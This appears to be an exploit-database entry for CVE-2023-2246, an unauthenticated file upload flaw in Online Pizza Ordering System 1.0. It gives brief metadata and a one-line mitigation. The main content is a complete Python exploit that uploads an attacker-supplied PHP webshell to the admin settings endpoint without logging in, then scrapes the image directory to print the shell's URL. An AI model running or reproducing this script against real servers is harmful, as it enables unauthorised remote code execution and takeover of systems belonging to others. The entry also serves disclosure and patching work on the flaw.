Online Pizza Ordering System 1.0 - Unauthenticated File Upload

vendor:

Online Pizza Ordering System

by:

URGAN

7.4

CVSS

HIGH

Unauthenticated File Upload

434

CWE

Product Name: Online Pizza Ordering System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2023-2246

CPE: a:sourcecodester:online_pizza_ordering_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23

2023

Online Pizza Ordering System 1.0 – Unauthenticated File Upload

This exploit allows an attacker to upload a malicious PHP webshell to the Online Pizza Ordering System 1.0. The attacker can then use the webshell to gain access to the server and execute arbitrary code.

Mitigation:

Ensure that all file uploads are authenticated and validated before being accepted.

Source

Exploit-DB raw data:

# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN 
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 
# CVE: CVE-2023-2246

#!/usr/bin/env python3
# coding: utf-8

import os
import requests
import argparse
from bs4 import BeautifulSoup

# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()

# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
    args.url = input('Enter URL with http://: ')
    args.payload = input('Enter file path PHP webshell: ')

# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'

filename = os.path.basename(args.payload)

files = [
  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
]

# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
    print('[+] File uploaded')
else:
    print(f'[-] Error {status_code}: {resp_upl.text}')
    raise SystemExit(f'[-] Script stopped due to error {status_code}.')

# send a GET request to the server
resp_find = requests.get(img_url)

# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')

# get all <a> tags on a page
links = soup.find_all('a')

# list to store found files
found_files = []

# we go through all the links and look for the desired file by its name
for link in links:
    file_upl = link.get('href')
    if file_upl.endswith(filename): # uploaded file name
        print('[+] Uploaded file found:', file_upl)
        file_url = img_url + file_upl # get the full URL of your file
        found_files.append(file_url) # add the file to the list of found files

# if the list is not empty, then display all found files
if found_files:
    print('[+] Full URL of your file:')
    for file_url in found_files:
        print('[+] ' + file_url)
else:
    print('[-] File not found')